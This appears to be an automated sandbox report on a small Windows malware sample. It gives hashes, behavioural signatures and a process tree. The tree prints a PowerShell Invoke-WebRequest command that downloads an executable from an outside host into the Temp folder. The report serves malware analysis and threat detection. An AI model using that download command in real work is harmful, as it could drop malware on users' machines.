Analysis
-
max time kernel
148s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
26-08-2024 01:20
Static task
static1
Behavioral task
behavioral1
Sample
20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe
Resource
win7-20240705-en
General
-
Target
20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe
-
Size
6KB
-
MD5
01846777e9d687771f28a1df5797b151
-
SHA1
4ede6b7ebee249b6cb241d1fb4b23f79d9aeca12
-
SHA256
51aa38810bf2c2f6f08eee6a75809543e78dc241a4587a8d0a0b0a76883be58a
-
SHA512
9e189c2ec6fbe481e4c3c6b3f0c5a648dcebd1779d70d938f9d193e157fcbe5c092ba438a662837fb1473bbf7e89bea3efc4c289d3d36130e7c37719834c8927
-
SSDEEP
48:0Pzuz3/foXeYDjyaAYqMettsQSaJiTi8xLEcztPLb3b3vr5vEuu6P+65I6rbJu:0P67TeuaABBDSyst9pvr51V+65vu
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 14 3636 powershell.exe -
pid Process 3636 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3636 powershell.exe 3636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3636 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4760 wrote to memory of 4844 4760 20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe 85 PID 4760 wrote to memory of 4844 4760 20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe 85 PID 4760 wrote to memory of 4844 4760 20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe 85 PID 4844 wrote to memory of 3636 4844 cmd.exe 86 PID 4844 wrote to memory of 3636 4844 cmd.exe 86 PID 4844 wrote to memory of 3636 4844 cmd.exe 86
Processes
-
C:\Users\Admin\AppData\Local\Temp\20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe"C:\Users\Admin\AppData\Local\Temp\20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\SysWOW64\cmd.exe/c ""C:\Users\Admin\AppData\Local\Temp\240629109.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://d.kuku.lu/pzdpx22ew -OutFile C:\Users\Admin\AppData\Local\Temp\example.exe"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3636
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
267B
MD5e935a45a7b718a715580e8ce15b12171
SHA1ce4a1affe0076f8dd33793986c67a17dd3b74556
SHA25676a0521bce7829098c7332ea262765db1d10203fbccfd2ded167700a3eb8d15d
SHA5121f57509a300893384bc71cb4b973177838f5aea12010101df89d1fa97995a91635b2fcf756a76a22e41189dd2c03445b3f930568461f787ed6c17eb2930a36e4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32KB
MD587e6afd2ee63f551b4506319665bad7d
SHA16490c36886505272944f4570ef2a8ba752163e62
SHA256ca5f0ecf24e979ebb15ba476fd0bc5df032b35cd41290a214323bf33e094413b
SHA5129e1684f530fdfcd36f51434a63b9752a569c2db9601cf58486be79fcef797f3c4f3ef3bd407c6d57c13661362be5281c8df98bd9da00490237c485234a47be95